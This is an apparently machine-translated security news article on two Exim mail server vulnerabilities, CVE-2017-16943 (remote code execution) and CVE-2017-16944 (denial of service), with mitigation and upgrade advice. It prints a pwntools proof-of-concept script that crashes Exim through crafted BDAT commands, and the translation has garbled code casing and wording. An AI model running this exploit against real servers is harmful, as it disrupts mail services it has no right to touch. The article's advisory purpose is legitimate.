Open source mail agent service Exim was blown rce and DOS vulnerabilities, it is recommended to upgrade quickly!

This is a creation in Article, where the information may have evolved or changed.

Impact Range
4.88 and 4.89

Introduction to open source mail transport agent Exim

Exim is a mail transfer agent developed by Philip Hazel of Cambridge University, responsible for the routing, forwarding and delivery of mail. It can run on most Unix-like systems, including Solaris, AIX, Linux, MacOS, and more. More flexible than other mta,exim configurations, support for string expansion technology to perform functions such as conditional judgment, character conversion, etc.

Exim Vulnerability submitted to BugTracker

A security researcher found and publicly disclosed two emergency vulnerabilities in the popular Internet Mail message transfer agent Exim, one of which could cause a remote attacker to execute malicious code on the target server.

The initial vulnerability was posted here by Phil Ponnock in Black Five (November 25) without any notice, submitted to the project's BugTracker.

Vulnerability Details

The first is the release of the vulnerability cve-2017-16943 after use, which can be used to remotely execute arbitrary code in the SMTP server by constructing a sequence of BDAT commands. The researchers also published the POC exploit code written in Python, where anyone can execute code in a vulnerable Exim server.
The second vulnerability is a DOS vulnerability, cve-2017-16944, which can cause a remote attacker to suspend the Exim server by forcing it to run indefinitely without crashing in the case of a connection shutdown. This vulnerability occurs because the '. ' that represents the end of the message is not properly checked when parsing the Bdat data header. Character. The researchers also provided the POC to exploit the code, causing the Exim server to run out of stacks and crash.

Poc

This is a POC that can cause a exim crash, and the cover map contains another vulnerability POC

# pip Install Pwntools
From PWN Import *
R = Remote (' localhost ', 25)
R.recvline ()
R.sendline ("EHLO test")
R.recvuntil ("Help")
R.sendline ("MAIL from:<test@localhost>")
R.recvline ()
R.sendline ("RCPT to:<test@localhost>")
R.recvline ()
#raw_input ()
R.sendline (' A ' *0x1100+ ' x7f ')
#raw_input ()
R.recvuntil (' command ')
R.sendline (' BDAT 1 ')
R.sendline (': BDAT x7f ')
s = ' a ' *6 + p64 (0xdeadbeef) * (0X1E00/8)
R.send (s+ ': Rn ')
R.recvuntil (' command ')
#raw_input ()
R.send (' n ')
R.interactive ()
Exit ()

Exim Service Distribution

Searching for "Exim" on fofa.so found a lot of servers using Exim services, but most of the Exim services were concentrated in the United States.

Interim mitigation measures

Depending on the description of the vulnerability submitter in BugTracker, the configuration file for the Exim needs to be added

chunking_advertise_hosts=

That is, the value of chunking_advertise_hosts is set to NULL, which disables the ESMTP CHUNKING extension so that Bdat is not available and thus avoids exploitation by the attacker.

Users should update to version 4.90 as soon as possible

Exim update is not very much, the previous version 4.88 just fixed the end of last year's cve-2016-9963 vulnerability, while the current two vulnerabilities affect 4.88 and the new version 4.89. To ensure security, users are advised to update to the Exim 4.90 release on GitHub in a timely manner. Currently, the Exim website does not download the 4.90 version of the bug.

This article comes from security guest, original address: https://www.anquanke.com/post/id/87337

Translated from: thehackernews.com